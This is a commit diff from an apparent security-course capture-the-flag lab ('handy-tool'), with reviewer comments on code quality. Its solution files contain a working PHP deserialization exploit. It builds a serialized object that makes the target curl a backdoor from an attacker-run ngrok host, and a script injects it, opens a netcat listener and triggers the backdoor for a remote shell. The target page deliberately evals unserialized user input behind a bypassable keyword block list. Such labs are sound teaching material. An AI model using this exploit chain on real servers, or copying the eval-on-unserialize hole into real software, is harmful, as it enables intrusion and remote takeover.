Add random name for the backdoor file + format files
Signed-off-by: Carina Deaconu <[email protected]>
carrrina committed Sep 13, 2023
1 parent 32a2e3b commit 356cf11
Showing 4 changed files with 117 additions and 113 deletions.
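--- a/exotic-attacks/activities/handy-tool/sol/backdoor_name.txt
+++ b/exotic-attacks/activities/handy-tool/sol/backdoor_name.txt
@@ -0,0 +1 @@
+f2ft24backdoor.php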
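--- a/exotic-attacks/activities/handy-tool/sol/make_backdoor.php
+++ b/exotic-attacks/activities/handy-tool/sol/make_backdoor.php
@@ -1,16 +1,17 @@
 <?php
-$NGROK_HOST = ""; // TODO: ngrok host (check README.md)
-$NGROK_PORT = 0; // TODO: ngrok port (check README.md)
+$NGROK_HOST = ""; // TODO: ngrok host (check README.md)
+$NGROK_PORT = 0; // TODO: ngrok port (check README.md)
 
-class PHPClass
-{
-public $condition = true;
-public $prop = "";
+class PHPClass
+{
+public $condition = true;
+public $prop = "";
 
-public function __construct($host, $port) {
-$this->prop = "system('curl http://".$host.":".$port." -o backdoor.php');";
-}
-}
+public function __construct($host, $port) {
+$backdoor_name = trim(file_get_contents("backdoor_name.txt"));
+$this->prop = "system('curl http://".$host.":".$port." -o $backdoor_name');";
+}
+}
 
-echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT)));
+echo urlencode(serialize(new PHPClass($NGROK_HOST, $NGROK_PORT)));
 ?>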
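Review bot: The new `file_get_contents("backdoor_name.txt")` call in `__construct` is unchecked and resolves against the current working directory, so when the file is missing or the script is started from another directory it returns false, `trim()` reduces that to an empty string, and the serialized payload is still printed with no output name. The value is also placed unquoted into the `system('curl … -o …')` string, so anything other than a plain file name in that text file changes the command that is built. Read the file relative to `__DIR__` and stop with an error unless the result matches a strict file-name pattern. The same unchecked, cwd-relative read appears in solution.sh as `backdoor_name=$(cat backdoor_name.txt)`.

```php
public function __construct($host, $port) {
    $raw = file_get_contents(__DIR__ . "/backdoor_name.txt");
    $backdoor_name = ($raw === false) ? "" : trim($raw);
    if (!preg_match('/^[A-Za-z0-9._-]+$/', $backdoor_name)) {
        fwrite(STDERR, "backdoor_name.txt is missing or does not contain a plain file name\n");
        exit(1);
    }
    // … unchanged: $this->prop assignment using $backdoor_name …
```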
6 changes: 4 additions & 2 deletions exotic-attacks/activities/handy-tool/sol/solution.sh
@@ -56,7 +56,8 @@ echo
backdoor_payload=$(php ./make_backdoor.php)
curl "$URL/?tool=unserialize&input=$backdoor_payload&submit=Submit" > /dev/null

echo "Step 5: Close the Flask app and open a new connection to your internal port using: \`nc -nlvk 1234\`"
echo "Step 5: Close the Flask app and open a new connection to your internal port using: \`nc -nlv 1234\`"
echo "You might need to add the -p option if you're working inside a VM."
echo "Press any key to continue if you did it."
while [ true ] ; do
read -n 1
@@ -66,4 +67,5 @@ while [ true ] ; do
done

echo "Finally: Now I am accessing the backdoor; check the \`nc\` terminal..."
curl "$URL""/backdoor.php"
backdoor_name=$(cat backdoor_name.txt)
curl "$URL""/""$backdoor_name"
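Review bot: The hint added to the Step 5 message, `You might need to add the -p option if you're working inside a VM.`, ties `-p` to running in a VM, while whether the listen port needs `-p` presumably depends on which netcat implementation is installed (traditional netcat takes the port through `-p`, the OpenBSD variant takes it positionally). Naming the variant in the message, for example `echo "If your nc is the traditional variant, pass the port with -p."`, tells students what to check on their machine. In the second hunk, `curl "$URL""/""$backdoor_name"` reads more simply as `curl "$URL/$backdoor_name"`. The `while` loop these hunks surround is only partly visible here.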
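--- a/exotic-attacks/activities/handy-tool/src/index.php
+++ b/exotic-attacks/activities/handy-tool/src/index.php
@@ -1,100 +1,100 @@
-<?php
-class PHPClass {
-public $condition;
-public $prop;
-
-function __construct() {
-
-}
-
-function __wakeup() {
-$forbbiden_commands = [
-"cat",
-"head",
-"grep",
-"tail",
-"tac",
-"rev",
-"awk",
-"sed",
-"more",
-"cut",
-"nl",
-"less",
-"sort",
-"python",
-"perl",
-"m4", // similar to `cat`
-];
-
-if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) {
-return;
-}
-
-foreach ($forbbiden_commands as $cmd) {
-if (strpos($this->prop, $cmd) !== false) {
-return;
-}
-}
-
-eval($this->prop);
-}
-}
-?>
-
-<!DOCTYPE html>
-<html>
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
-</head>
-
-<body>
-<div>
-<div class="container">
-<div class="row">
-<div class="bg-white p-5 mx-auto col-md-8 col-10">
-<h3 class="display-3">Handy Tools<br></h3>
-<form method="GET">
-<div class="form-group">
-<label>Select tool</label>
-<select name="tool" class="form-control">
-<option value="toupper">To Upper Case</option>
-<option value="unserialize">Unserialize</option>
-<option value="trim">Trim whitespaces</option>
-<option value="manny">Guess my last name: Manny...</option>
-</select>
-</div>
-<div class="form-group">
-<label>Input</label>
-<input name="input" type="text" class="form-control">
-<small class="form-text text-muted"></small>
-</div>
-<?php
-if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') {
-echo var_dump(strtoupper($_GET['input']));
-echo "<br>"; echo "<br>"; echo "<br>";
-} elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') {
-echo var_dump(unserialize($_GET['input']));
-echo "<br>"; echo "<br>"; echo "<br>";
-} elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') {
-echo var_dump(str_replace(' ', '', $_GET['input']));
-echo "<br>"; echo "<br>"; echo "<br>";
-} elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') {
-if (strtolower($_GET['input']) == 'iscusitul')
-echo "backup.zip";
-else
-echo "Wrong!";
-echo "<br>"; echo "<br>"; echo "<br>";
-}
-?>
-<input type="submit" class="btn btn-primary" name="submit" value="Submit" />
-</form>
-</div>
-</div>
-</div>
-</div>
-</body>
-
-</html>
+<?php
+class PHPClass {
+public $condition;
+public $prop;
+
+function __construct() {
+
+}
+
+function __wakeup() {
+$forbbiden_commands = [
+"cat",
+"head",
+"grep",
+"tail",
+"tac",
+"rev",
+"awk",
+"sed",
+"more",
+"cut",
+"nl",
+"less",
+"sort",
+"python",
+"perl",
+"m4", // similar to `cat`
+];
+
+if (!isset($this->prop) or !isset($this->condition) or !$this->condition == true) {
+return;
+}
+
+foreach ($forbbiden_commands as $cmd) {
+if (strpos($this->prop, $cmd) !== false) {
+return;
+}
+}
+
+eval($this->prop);
+}
+}
+?>
+
+<!DOCTYPE html>
+<html>
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css">
+</head>
+
+<body>
+<div>
+<div class="container">
+<div class="row">
+<div class="bg-white p-5 mx-auto col-md-8 col-10">
+<h3 class="display-3">Handy Tools<br></h3>
+<form method="GET">
+<div class="form-group">
+<label>Select tool</label>
+<select name="tool" class="form-control">
+<option value="toupper">To Upper Case</option>
+<option value="unserialize">Unserialize</option>
+<option value="trim">Trim whitespaces</option>
+<option value="manny">Guess my last name: Manny...</option>
+</select>
+</div>
+<div class="form-group">
+<label>Input</label>
+<input name="input" type="text" class="form-control">
+<small class="form-text text-muted"></small>
+</div>
+<?php
+if (isset($_GET['tool']) && $_GET['tool'] == 'toupper') {
+echo var_dump(strtoupper($_GET['input']));
+echo "<br>"; echo "<br>"; echo "<br>";
+} elseif (isset($_GET['tool']) && $_GET['tool'] == 'unserialize') {
+echo var_dump(unserialize($_GET['input']));
+echo "<br>"; echo "<br>"; echo "<br>";
+} elseif (isset($_GET['tool']) && $_GET['tool'] == 'trim') {
+echo var_dump(str_replace(' ', '', $_GET['input']));
+echo "<br>"; echo "<br>"; echo "<br>";
+} elseif (isset($_GET['tool']) && $_GET['tool'] == 'manny') {
+if (strtolower($_GET['input']) == 'iscusitul')
+echo "backup.zip";
+else
+echo "Wrong!";
+echo "<br>"; echo "<br>"; echo "<br>";
+}
+?>
+<input type="submit" class="btn btn-primary" name="submit" value="Submit" />
+</form>
+</div>
+</div>
+</div>
+</div>
+</body>
+
+</html>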
